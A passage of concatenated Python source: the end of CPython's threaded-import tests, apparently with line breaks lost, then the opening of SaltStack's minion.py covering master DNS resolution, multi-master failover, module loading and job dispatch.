sys.modules['random'] = self.old_random @mock_register_at_fork def check_parallel_module_init(self, mock_os): if imp.lock_held(): # This triggers on, e.g., from test import autotest. 
raise unittest.SkipTest("can't run when import lock is held") done = threading.Event() for N in (20, 50) * 3: if verbose: print("Trying", N, "threads ...", end=' ') # Make sure that random and modulefinder get reimported freshly for modname in ['random', 'modulefinder']: try: del sys.modules[modname] except KeyError: pass errors = [] done_tasks = [] done.clear() t0 = time.monotonic() with threading_helper.start_threads( threading.Thread(target=task, args=(N, done, done_tasks, errors,)) for i in range(N)): pass completed = done.wait(10 * 60) dt = time.monotonic() - t0 if verbose: print("%.1f ms" % (dt*1e3), flush=True, end=" ") dbg_info = 'done: %s/%s' % (len(done_tasks), N) self.assertFalse(errors, dbg_info) self.assertTrue(completed, dbg_info) if verbose: print("OK.") def test_parallel_module_init(self): self.check_parallel_module_init() def test_parallel_meta_path(self): finder = Finder() sys.meta_path.insert(0, finder) try: self.check_parallel_module_init() self.assertGreater(finder.numcalls, 0) self.assertEqual(finder.x, finder.numcalls) finally: sys.meta_path.remove(finder) def test_parallel_path_hooks(self): # Here the Finder instance is only used to check concurrent calls # to path_hook(). finder = Finder() # In order for our path hook to be called at each import, we need # to flush the path_importer_cache, which we do by registering a # dedicated meta_path entry. flushing_finder = FlushingFinder() def path_hook(path): finder.find_spec('') raise ImportError sys.path_hooks.insert(0, path_hook) sys.meta_path.append(flushing_finder) try: # Flush the cache a first time flushing_finder.find_spec('') numtests = self.check_parallel_module_init() self.assertGreater(finder.numcalls, 0) self.assertEqual(finder.x, finder.numcalls) finally: sys.meta_path.remove(flushing_finder) sys.path_hooks.remove(path_hook) def test_import_hangers(self): # In case this test is run again, make sure the helper module # gets loaded from scratch again. try: del sys.modules['test.test_importlib.threaded_import_hangers'] except KeyError: pass import test.test_importlib.threaded_import_hangers self.assertFalse(test.test_importlib.threaded_import_hangers.errors) def test_circular_imports(self): # The goal of this test is to exercise implementations of the import # lock which use a per-module lock, rather than a global lock. # In these implementations, there is a possible deadlock with # circular imports, for example: # - thread 1 imports A (grabbing the lock for A) which imports B # - thread 2 imports B (grabbing the lock for B) which imports A # Such implementations should be able to detect such situations and # resolve them one way or the other, without freezing. # NOTE: our test constructs a slightly less trivial import cycle, # in order to better stress the deadlock avoidance mechanism. 
delay = 0.5 os.mkdir(TESTFN) self.addCleanup(shutil.rmtree, TESTFN) sys.path.insert(0, TESTFN) self.addCleanup(sys.path.remove, TESTFN) for name, contents in circular_imports_modules.items(): contents = contents % {'delay': delay} with open(os.path.join(TESTFN, name + ".py"), "wb") as f: f.write(contents.encode('utf-8')) self.addCleanup(forget, name) importlib.invalidate_caches() results = [] def import_ab(): import A results.append(getattr(A, 'x', None)) def import_ba(): import B results.append(getattr(B, 'x', None)) t1 = threading.Thread(target=import_ab) t2 = threading.Thread(target=import_ba) t1.start() t2.start() t1.join() t2.join() self.assertEqual(set(results), {'a', 'b'}) @mock_register_at_fork def test_side_effect_import(self, mock_os): code = """if 1: import threading def target(): import random t = threading.Thread(target=target) t.start() t.join() t = None""" sys.path.insert(0, os.curdir) self.addCleanup(sys.path.remove, os.curdir) filename = TESTFN + ".py" with open(filename, "wb") as f: f.write(code.encode('utf-8')) self.addCleanup(unlink, filename) self.addCleanup(forget, TESTFN) self.addCleanup(rmtree, '__pycache__') importlib.invalidate_caches() __import__(TESTFN) del sys.modules[TESTFN] @threading_helper.reap_threads def test_main(): old_switchinterval = None try: old_switchinterval = sys.getswitchinterval() sys.setswitchinterval(1e-5) except AttributeError: pass try: run_unittest(ThreadedImportTests) finally: if old_switchinterval is not None: sys.setswitchinterval(old_switchinterval) if __name__ == "__main__": test_main()
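# Illustrative sketch, not part of the test above: the modules written by
# test_circular_imports form the cycle A -> C -> B -> D -> A. With per-module
# import locks the dangerous interleaving is, schematically:
#
#   thread 1: lock(A) -> execute A -> ... -> blocks acquiring lock(B)
#   thread 2: lock(B) -> execute B -> ... -> blocks acquiring lock(A)
#
# importlib's _ModuleLock detects such a cycle and raises an internal deadlock
# error for one acquisition; that thread then accepts the partially
# initialized module instead of freezing, so both imports finish -- which is
# why assertEqual(set(results), {'a', 'b'}) holds in the test.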
minion.py
# -*- coding: utf-8 -*- ''' Routines to set up a minion ''' # Import python libs from __future__ import absolute_import, print_function import os import re import sys import copy import time import types import signal import fnmatch import logging import threading import traceback import multiprocessing from random import randint, shuffle from salt.config import DEFAULT_MINION_OPTS from stat import S_IMODE # Import Salt Libs # pylint: disable=import-error,no-name-in-module,redefined-builtin import salt.ext.six as six if six.PY3: import ipaddress else: import salt.ext.ipaddress as ipaddress from salt.ext.six.moves import range # pylint: enable=no-name-in-module,redefined-builtin # Import third party libs try: import zmq # TODO: cleanup import zmq.eventloop.ioloop # support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'): zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop HAS_ZMQ = True except ImportError: # Running in local, zmq not needed HAS_ZMQ = False HAS_RANGE = False try: import seco.range HAS_RANGE = True except ImportError: pass HAS_PSUTIL = False try: import salt.utils.psutil_compat as psutil HAS_PSUTIL = True except ImportError: pass HAS_RESOURCE = False try: import resource HAS_RESOURCE = True except ImportError: pass try: import zmq.utils.monitor HAS_ZMQ_MONITOR = True except ImportError: HAS_ZMQ_MONITOR = False # pylint: enable=import-error # Import salt libs import salt import salt.client import salt.crypt import salt.loader import salt.beacons import salt.payload import salt.syspaths import salt.utils import salt.utils.jid import salt.pillar import salt.utils.args import salt.utils.event import salt.utils.minions import salt.utils.schedule import salt.utils.error import salt.utils.zeromq import salt.defaults.exitcodes import salt.cli.daemons from salt.defaults import DEFAULT_TARGET_DELIM from salt.executors import FUNCTION_EXECUTORS from salt.utils.debug import enable_sigusr1_handler from salt.utils.event import tagify from salt.exceptions import ( CommandExecutionError, CommandNotFoundError, SaltInvocationError, SaltReqTimeoutError, SaltClientError, SaltSystemExit ) import tornado.gen # pylint: disable=F0401 import tornado.ioloop # pylint: disable=F0401 log = logging.getLogger(__name__) # To set up a minion: # 1. Read in the configuration # 2. Generate the function mapping dict # 3. Authenticate with the master # 4. Store the AES key # 5. Connect to the publisher # 6. Handle publications def resolve_dns(opts): ''' Resolves the master_ip and master_uri options ''' ret = {} check_dns = True if (opts.get('file_client', 'remote') == 'local' and not opts.get('use_master_when_local', False)): check_dns = False if check_dns is True: # Because I import salt.log below I need to re-import salt.utils here import salt.utils try: if opts['master'] == '': raise SaltSystemExit ret['master_ip'] = \ salt.utils.dns_check(opts['master'], True, opts['ipv6']) except SaltClientError: if opts['retry_dns']: while True: import salt.log msg = ('Master hostname: \'{0}\' not found. 
Retrying in {1} ' 'seconds').format(opts['master'], opts['retry_dns']) if salt.log.is_console_configured(): log.error(msg) else: print('WARNING: {0}'.format(msg)) time.sleep(opts['retry_dns']) try: ret['master_ip'] = salt.utils.dns_check( opts['master'], True, opts['ipv6'] ) break except SaltClientError: pass else: ret['master_ip'] = '127.0.0.1' except SaltSystemExit: unknown_str = 'unknown address' master = opts.get('master', unknown_str) if master == '': master = unknown_str if opts.get('__role') == 'syndic': err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master) else: err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master) log.error(err) raise SaltSystemExit(code=42, msg=err) else: ret['master_ip'] = '127.0.0.1' if 'master_ip' in ret and 'master_ip' in opts: if ret['master_ip'] != opts['master_ip']: log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'], ret['master_ip']) ) ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'], port=opts['master_port']) return ret def prep_ip_port(opts): ret = {} if opts['master_uri_format'] == 'ip_only': ret['master'] = opts['master'] else: ip_port = opts['master'].rsplit(":", 1) if len(ip_port) == 1: # e.g. master: mysaltmaster ret['master'] = ip_port[0] else: # e.g. master: localhost:1234 # e.g. master: 127.0.0.1:1234 # e.g. master: ::1:1234 ret['master'] = ip_port[0] ret['master_port'] = ip_port[1] return ret def get_proc_dir(cachedir, **kwargs): ''' Given the cache directory, return the directory that process data is stored in, creating it if it doesn't exist. The following optional Keyword Arguments are handled: mode: which is anything os.makedir would accept as mode. uid: the uid to set, if not set, or it is None or -1 no changes are made. Same applies if the directory is already owned by this uid. Must be int. Works only on unix/unix like systems. gid: the gid to set, if not set, or it is None or -1 no changes are made. Same applies if the directory is already owned by this gid. Must be int. Works only on unix/unix like systems. ''' fn_ = os.path.join(cachedir, 'proc') mode = kwargs.pop('mode', None) if mode is None: mode = {} else: mode = {'mode': mode} if not os.path.isdir(fn_): # proc_dir is not present, create it with mode settings os.makedirs(fn_, **mode) d_stat = os.stat(fn_) # if mode is not an empty dict then we have an explicit # dir mode. So lets check if mode needs to be changed. if mode: mode_part = S_IMODE(d_stat.st_mode) if mode_part != mode['mode']: os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode']) if hasattr(os, 'chown'): # only on unix/unix like systems uid = kwargs.pop('uid', -1) gid = kwargs.pop('gid', -1) # if uid and gid are both -1 then go ahead with # no changes at all if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \ [i for i in (uid, gid) if i != -1]: os.chown(fn_, uid, gid) return fn_ def parse_args_and_kwargs(func, args, data=None): ''' Wrap load_args_and_kwargs ''' salt.utils.warn_until( 'Boron', 'salt.minion.parse_args_and_kwargs() has been renamed to ' 'salt.minion.load_args_and_kwargs(). Please change this function call ' 'before the Boron release of Salt.' 
) return load_args_and_kwargs(func, args, data=data) def load_args_and_kwargs(func, args, data=None, ignore_invalid=False): ''' Detect the args and kwargs that need to be passed to a function call, and check them against what was passed. ''' argspec = salt.utils.args.get_function_argspec(func) _args = [] _kwargs = {} invalid_kwargs = [] for arg in args: if isinstance(arg, six.string_types): string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632 if string_arg: # Don't append the version that was just derived from parse_cli # above, that would result in a 2nd call to # salt.utils.cli.yamlify_arg(), which could mangle the input. _args.append(arg) elif string_kwarg: salt.utils.warn_until( 'Boron', 'The list of function args and kwargs should be parsed ' 'by salt.utils.args.parse_input() before calling ' 'salt.minion.load_args_and_kwargs().' ) if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs.update(string_kwarg) else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. for key, val in six.iteritems(string_kwarg): invalid_kwargs.append('{0}={1}'.format(key, val)) continue # if the arg is a dict with __kwarg__ == True, then its a kwarg elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True: for key, val in six.iteritems(arg): if argspec.keywords or key in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs[key] = val else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. invalid_kwargs.append('{0}={1}'.format(key, val)) continue else: _args.append(arg) if invalid_kwargs and not ignore_invalid: salt.utils.invalid_kwargs(invalid_kwargs) if argspec.keywords and isinstance(data, dict): # this function accepts **kwargs, pack in the publish data for key, val in six.iteritems(data): _kwargs['__pub_{0}'.format(key)] = val return _args, _kwargs class MinionBase(object): def __init__(self, opts): self.opts = opts @staticmethod def process_schedule(minion, loop_interval): try: minion.schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if minion.schedule.loop_interval < loop_interval: loop_interval = minion.schedule.loop_interval log.debug( 'Overriding loop_interval because of scheduled jobs.' ) except Exception as exc: log.error( 'Exception {0} occurred in scheduled job'.format(exc) ) return loop_interval def process_beacons(self, functions): ''' Evaluate all of the configured beacons, grab the config again in case the pillar or grains changed ''' if 'config.merge' in functions: b_conf = functions['config.merge']('beacons') if b_conf: return self.beacons.process(b_conf) return [] @tornado.gen.coroutine def eval_master(self, opts, timeout=60, safe=True, failed=False): ''' Evaluates and returns a tuple of the current master address and the pub_channel. In standard mode, just creates a pub_channel with the given master address. With master_type=func evaluates the current master address from the given module and then creates a pub_channel. With master_type=failover takes the list of masters and loops through them. The first one that allows the minion to create a pub_channel is then returned. 
If this function is called outside the minions initialization phase (for example from the minions main event-loop when a master connection loss was detected), 'failed' should be set to True. The current (possibly failed) master will then be removed from the list of masters. ''' # check if master_type was altered from its default if opts['master_type'] != 'str' and opts['__role'] != 'syndic': # check for a valid keyword if opts['master_type'] == 'func': # split module and function and try loading the module mod, fun = opts['master'].split('.') try: master_mod = salt.loader.raw_mod(opts, mod, fun) if not master_mod: raise TypeError # we take whatever the module returns as master address opts['master'] = master_mod[mod + '.' + fun]() except TypeError: msg = ('Failed to evaluate master address from ' 'module \'{0}\''.format(opts['master'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) log.info('Evaluated master from module: {0}'.format(master_mod)) # if failover is set, master has to be of type list elif opts['master_type'] == 'failover': if isinstance(opts['master'], list): log.info('Got list of available master addresses:' ' {0}'.format(opts['master'])) if opts['master_shuffle']: shuffle(opts['master']) # if opts['master'] is a str and we have never created opts['master_list'] elif isinstance(opts['master'], str) and ('master_list' not in opts): # We have a string, but a list was what was intended. Convert. # See issue 23611 for details opts['master'] = [opts['master']] elif opts['__role'] == 'syndic': log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master'])) # if failed=True, the minion was previously connected # we're probably called from the minions main-event-loop # because a master connection loss was detected. remove # the possibly failed master from the list of masters. elif failed: log.info('Removing possibly failed master {0} from list of' ' masters'.format(opts['master'])) # create new list of master with the possibly failed one removed opts['master'] = [x for x in opts['master_list'] if opts['master'] != x] else: msg = ('master_type set to \'failover\' but \'master\' ' 'is not of type list but of type ' '{0}'.format(type(opts['master']))) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # If failover is set, minion have to failover on DNS errors instead of retry DNS resolve. # See issue 21082 for details if opts['retry_dns']: msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. 
' 'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.') log.critical(msg) opts['retry_dns'] = 0 else: msg = ('Invalid keyword \'{0}\' for variable ' '\'master_type\''.format(opts['master_type'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop # (The channel factories will set a default if the kwarg isn't passed) factory_kwargs = {'timeout': timeout, 'safe': safe} if getattr(self, 'io_loop', None): factory_kwargs['io_loop'] = self.io_loop # if we have a list of masters, loop through them and be # happy with the first one that allows us to connect if isinstance(opts['master'], list): conn = False # shuffle the masters and then loop through them local_masters = copy.copy(opts['master']) for master in local_masters: opts['master'] = master opts.update(prep_ip_port(opts)) opts.update(resolve_dns(opts)) self.opts = opts # on first run, update self.opts with the whole master list # to enable a minion to re-use old masters if they get fixed if 'master_list' not in opts: opts['master_list'] = local_masters try: pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs) yield pub_channel.connect() conn = True break except SaltClientError: msg = ('Master {0} could not be reached, trying ' 'next master (if any)'.format(opts['master'])) log.info(msg) continue if not conn: self.connected = False msg = ('No master could be reached or all masters denied ' 'the minions connection attempt.') log.error(msg) else: self.tok = pub_channel.auth.gen_token('salt') self.connected = True raise tornado.gen.Return((opts['master'], pub_channel)) # single master sign in else: opts.update(prep_ip_port(opts)) opts.update(resolve_dns(opts)) pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs) yield pub_channel.connect() self.tok = pub_channel.auth.gen_token('salt') self.connected = True raise tornado.gen.Return((opts['master'], pub_channel)) class SMinion(MinionBase): ''' Create an object that has loaded all of the minion module functions, grains, modules, returners etc. The SMinion allows developers to generate all of the salt minion functions and present them with these functions for general use. 
''' def __init__(self, opts): # Late setup of the opts grains, so we can log from the grains module opts['grains'] = salt.loader.grains(opts) super(SMinion, self).__init__(opts) # Clean out the proc directory (default /var/cache/salt/minion/proc) if (self.opts.get('file_client', 'remote') == 'remote' or self.opts.get('use_master_when_local', False)): self.eval_master(self.opts, failed=True) self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Load all of the modules for the minion ''' self.opts['pillar'] = salt.pillar.get_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['environment'], pillarenv=self.opts.get('pillarenv'), ).compile_pillar() self.utils = salt.loader.utils(self.opts) self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, include_errors=True) self.proxy = salt.loader.proxy(self.opts, None) # TODO: remove self.function_errors = {} # Keep the funcs clean self.returners = salt.loader.returners(self.opts, self.functions) self.states = salt.loader.states(self.opts, self.functions, self.utils) self.rend = salt.loader.render(self.opts, self.functions) self.matcher = Matcher(self.opts, self.functions) self.functions['sys.reload_modules'] = self.gen_modules self.executors = salt.loader.executors(self.opts) class MasterMinion(object): ''' Create a fully loaded minion function object for generic use on the master. What makes this class different is that the pillar is omitted, otherwise everything else is loaded cleanly. ''' def __init__( self, opts, returners=True, states=True, rend=True, matcher=True, whitelist=None): self.opts = salt.config.minion_config(opts['conf_file']) self.opts.update(opts) self.whitelist = whitelist self.opts['grains'] = salt.loader.grains(opts) self.opts['pillar'] = {} self.mk_returners = returners self.mk_states = states self.mk_rend = rend self.mk_matcher = matcher self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Load all of the modules for the minion ''' self.utils = salt.loader.utils(self.opts) self.functions = salt.loader.minion_mods( self.opts, utils=self.utils, whitelist=self.whitelist, initial_load=initial_load) if self.mk_returners: self.returners = salt.loader.returners(self.opts, self.functions) if self.mk_states: self.states = salt.loader.states(self.opts, self.functions, self.utils) if self.mk_rend: self.rend = salt.loader.render(self.opts, self.functions) if self.mk_matcher: self.matcher = Matcher(self.opts, self.functions) self.functions['sys.reload_modules'] = self.gen_modules class MultiMinion(MinionBase): ''' Create a multi minion interface, this creates as many minions as are defined in the master option and binds each minion object to a respective master. 
''' # timeout for one of the minions to auth with a master MINION_CONNECT_TIMEOUT = 5 def __init__(self, opts): super(MultiMinion, self).__init__(opts) self.auth_wait = self.opts['acceptance_wait_time'] self.max_auth_wait = self.opts['acceptance_wait_time_max'] zmq.eventloop.ioloop.install() self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop() def _spawn_minions(self): ''' Spawn all the coroutines which will sign in to masters ''' if not isinstance(self.opts['master'], list): log.error( 'Attempting to start a multimaster system with one master') sys.exit(salt.defaults.exitcodes.EX_GENERIC) for master in set(self.opts['master']): s_opts = copy.deepcopy(self.opts) s_opts['master'] = master s_opts['multimaster'] = True s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT self.io_loop.spawn_callback(self._connect_minion, s_opts) @tornado.gen.coroutine def _connect_minion(self, opts): ''' Create a minion, and asynchronously connect it to a master ''' last = 0 # never have we signed in auth_wait = opts['acceptance_wait_time'] while True: try: minion = Minion(opts, self.MINION_CONNECT_TIMEOUT, False, io_loop=self.io_loop, loaded_base_name='salt.loader.{0}'.format(opts['master']), ) yield minion.connect_master() minion.tune_in(start=False) break except SaltClientError as exc: log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master'])) last = time.time() if auth_wait < self.max_auth_wait: auth_wait += self.auth_wait yield tornado.gen.sleep(auth_wait) # TODO: log? except Exception as e: log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True) # Multi Master Tune In def tune_in(self): ''' Bind to the masters This loop will attempt to create connections to masters it hasn't connected to yet, but once the initial connection is made it is up to ZMQ to do the reconnect (don't know of an API to get the state here in salt) ''' # Fire off all the minion coroutines self.minions = self._spawn_minions() # serve forever! self.io_loop.start() class Minion(MinionBase): ''' This class instantiates a minion, runs connections for a minion, and loads all of the functions into the minion ''' def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231 ''' Pass in the options dict ''' # this means that the parent class doesn't know *which* master we connect to super(Minion, self).__init__(opts) self.timeout = timeout self.safe = safe self._running = None self.win_proc = [] self.loaded_base_name = loaded_base_name if io_loop is None: zmq.eventloop.ioloop.install() self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop() else: self.io_loop = io_loop # Warn if ZMQ < 3.2 if HAS_ZMQ: try: zmq_version_info = zmq.zmq_version_info() except AttributeError: # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to # using zmq.zmq_version() and build a version info tuple. zmq_version_info = tuple( [int(x) for x in zmq.zmq_version().split('.')] ) if zmq_version_info < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) # Late setup the of the opts grains, so we can log from the grains # module if 'proxyid' not in self.opts: self.opts['grains'] = salt.loader.grains(opts) # TODO: remove? 
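    # With the failover handling in MinionBase.eval_master above, a minion
    # configured along these lines (values illustrative):
    #
    #     master_type: failover
    #     master:
    #       - master1.example.com
    #       - master2.example.com
    #     master_shuffle: True
    #     retry_dns: 0
    #
    # tries each master in turn at connect time, while the '__master_alive'
    # schedule job added in _post_master_init below runs status.master
    # periodically and is what detects a lost master connection.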
    def sync_connect_master(self):
        '''
        Block until we are connected to a master
        '''
        log.debug("sync_connect_master")
        self._connect_master_future = self.connect_master()
        # finish connecting to master
        self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop())
        self.io_loop.start()
        # I made the following 3 line oddity to preserve traceback.
        # Please read PR #23978 before changing, hopefully avoiding regressions.
        # Good luck, we're all counting on you. Thanks.
        future_exception = self._connect_master_future.exc_info()
        if future_exception:
            six.reraise(*future_exception)

    @tornado.gen.coroutine
    def connect_master(self):
        '''
        Return a future which will complete when you are connected to a master
        '''
        master, self.pub_channel = yield self.eval_master(self.opts,
                                                          self.timeout,
                                                          self.safe)
        yield self._post_master_init(master)

    # TODO: better name...
    @tornado.gen.coroutine
    def _post_master_init(self, master):
        '''
        Function to finish init after connecting to a master

        This is primarily loading modules, pillars, etc. (since they need
        to know which master they connected to)
        '''
        self.opts['master'] = master

        self.opts['pillar'] = yield salt.pillar.get_async_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['environment'],
            pillarenv=self.opts.get('pillarenv')
        ).compile_pillar()
        self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
        self.serial = salt.payload.Serial(self.opts)
        self.mod_opts = self._prep_mod_opts()
        self.matcher = Matcher(self.opts, self.functions)
        self.beacons = salt.beacons.Beacon(self.opts, self.functions)
        uid = salt.utils.get_uid(user=self.opts.get('user', None))
        self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)

        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners)

        # add default scheduling jobs to the minions scheduler
        if 'mine.update' in self.functions:
            log.info('Added mine.update to scheduler')
            self.schedule.add_job({
                '__mine_interval':
                {
                    'function': 'mine.update',
                    'minutes': self.opts['mine_interval'],
                    'jid_include': True,
                    'maxrunning': 2
                }
            }, persist=True)

        # add master_alive job if enabled
        if self.opts['master_alive_interval'] > 0:
            self.schedule.add_job({
                '__master_alive':
                {
                    'function': 'status.master',
                    'seconds': self.opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 1,
                    'kwargs': {'master': self.opts['master'],
                               'connected': True}
                }
            }, persist=True)

        self.grains_cache = self.opts['grains']

    def _return_retry_timer(self):
        '''
        Based on the minion configuration, either return a randomized timer or
        just return the value of the return_retry_timer.
        '''
        msg = 'Minion return retry timer set to {0} seconds'
        if self.opts.get('return_retry_random'):
            try:
                random_retry = randint(1, self.opts['return_retry_timer'])
            except ValueError:
                # Catch wiseguys using negative integers here
                log.error(
                    'Invalid value ({0}) for return_retry_timer, must be a '
                    'positive integer'.format(self.opts['return_retry_timer'])
                )
                log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
                return DEFAULT_MINION_OPTS['return_retry_timer']
            else:
                log.debug(msg.format(random_retry) + ' (randomized)')
                return random_retry
        else:
            log.debug(msg.format(self.opts.get('return_retry_timer')))
            return self.opts.get('return_retry_timer')

    def _prep_mod_opts(self):
        '''
        Returns a copy of the opts with key bits stripped out
        '''
        mod_opts = {}
        for key, val in six.iteritems(self.opts):
            if key == 'logger':
                continue
            mod_opts[key] = val
        return mod_opts

    def _process_beacons(self):
        '''
        Process each beacon and send events if appropriate
        '''
        # Process Beacons
        try:
            beacons = self.process_beacons(self.functions)
        except Exception:
            log.critical('Beacon processing failed: {0}. No beacons will '
                         'be processed.'.format(traceback.format_exc()))
            beacons = None
        if beacons:
            self._fire_master(events=beacons)
            for beacon in beacons:
                serialized_data = salt.utils.dicttrim.trim_dict(
                    self.serial.dumps(beacon['data']),
                    self.opts.get('max_event_size', 1048576),
                    is_msgpacked=True,
                )
                log.debug('Sending event - data = {0}'.format(beacon['data']))
                event = '{0}{1}{2}'.format(
                    beacon['tag'],
                    salt.utils.event.TAGEND,
                    serialized_data,
                )
                self.event_publisher.handle_publish([event])

    def _load_modules(self, force_refresh=False, notify=False):
        '''
        Return the functions and the returners loaded up from the loader
        module
        '''
        # if this is a *nix system AND modules_max_memory is set, lets enforce
        # a memory limit on module imports
        # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
        modules_max_memory = False
        if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
            log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
            modules_max_memory = True
            old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
            rss, vms = psutil.Process(os.getpid()).memory_info()
            mem_limit = rss + vms + self.opts['modules_max_memory']
            resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
        elif self.opts.get('modules_max_memory', -1) > 0:
            if not HAS_PSUTIL:
                log.error('Unable to enforce modules_max_memory because psutil is missing')
            if not HAS_RESOURCE:
                log.error('Unable to enforce modules_max_memory because resource is missing')

        self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
        self.utils = salt.loader.utils(self.opts)
        if self.opts.get('multimaster', False):
            s_opts = copy.deepcopy(self.opts)
            functions = salt.loader.minion_mods(s_opts, utils=self.utils,
                                                loaded_base_name=self.loaded_base_name,
                                                notify=notify)
        else:
            functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify)
        returners = salt.loader.returners(self.opts, functions)
        errors = {}
        if '_errors' in functions:
            errors = functions['_errors']
            functions.pop('_errors')

        # we're done, reset the limits!
        if modules_max_memory is True:
            resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)

        executors = salt.loader.executors(self.opts, functions)

        return functions, returners, errors, executors

    def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
        '''
        Fire an event on the master, or drop message if unable to send.
        '''
        load = {'id': self.opts['id'],
                'cmd': '_minion_event',
                'pretag': pretag,
                'tok': self.tok}
        if events:
            load['events'] = events
        elif data and tag:
            load['data'] = data
            load['tag'] = tag
        elif not data and tag:
            load['data'] = {}
            load['tag'] = tag
        else:
            return

        channel = salt.transport.Channel.factory(self.opts)
        try:
            channel.send(load, timeout=timeout)
            return True
        except Exception:
            log.info('fire_master failed: {0}'.format(traceback.format_exc()))
            return False

    def _handle_decoded_payload(self, data):
        '''
        Override this method if you wish to handle the decoded data
        differently.
        '''
        if 'user' in data:
            log.info(
                'User {0[user]} Executing command {0[fun]} with jid '
                '{0[jid]}'.format(data)
            )
        else:
            log.info(
                'Executing command {0[fun]} with jid {0[jid]}'.format(data)
            )
        log.debug('Command details {0}'.format(data))

        if isinstance(data['fun'], six.string_types):
            if data['fun'] == 'sys.reload_modules':
                self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
                self.schedule.functions = self.functions
                self.schedule.returners = self.returners

        if isinstance(data['fun'], (tuple, list)):
            target = Minion._thread_multi_return
        else:
            target = Minion._thread_return

        # We stash an instance reference to allow for the socket
        # communication in Windows. You can't pickle functions, and thus
        # python needs to be able to reconstruct the reference on the other
        # side.
        instance = self
        if self.opts['multiprocessing']:
            if sys.platform.startswith('win'):
                # let python reconstruct the minion on the other side if we're
                # running on windows
                instance = None
            process = multiprocessing.Process(
                target=target, args=(instance, self.opts, data)
            )
        else:
            process = threading.Thread(
                target=target,
                args=(instance, self.opts, data),
                name=data['jid']
            )
        process.start()
        if not sys.platform.startswith('win'):
            process.join()
        else:
            self.win_proc.append(process)

    @classmethod
    def _thread_return(cls, minion_instance, opts, data):
        '''
        This method should be used as a threading target, start the actual
        minion side execution.
        '''
        # this seems awkward at first, but it's a workaround for Windows
        # multiprocessing communication.
        if sys.platform.startswith('win') and \
                opts['multiprocessing'] and \
                not salt.log.is_logging_configured():
            # We have to re-init the logging system for Windows
            salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
            if opts.get('log_file'):
                salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
        if not minion_instance:
            minion_instance = cls(opts)
            if not hasattr(minion_instance, 'functions'):
                functions, returners, function_errors, executors = (
                    minion_instance._load_modules()
                )
                minion_instance.functions = functions
                minion_instance.returners = returners
                minion_instance.function_errors = function_errors
                minion_instance.executors = executors
            if not hasattr(minion_instance, 'serial'):
                minion_instance.serial = salt.payload.Serial(opts)
            if not hasattr(minion_instance, 'proc_dir'):
                uid = salt.utils.get_uid(user=opts.get('user', None))
                minion_instance.proc_dir = (
                    get_proc_dir(opts['cachedir'], uid=uid)
                )

        fn_ = os.path.join(minion_instance.proc_dir, data['jid'])

        if opts['multiprocessing']:
            salt.utils.daemonize_if(opts)

        salt.utils.appendproctitle(data['jid'])

        sdata = {'pid': os.getpid()}
        sdata.update(data)
        log.info('Starting a new job with PID {0}'.format(sdata['pid']))
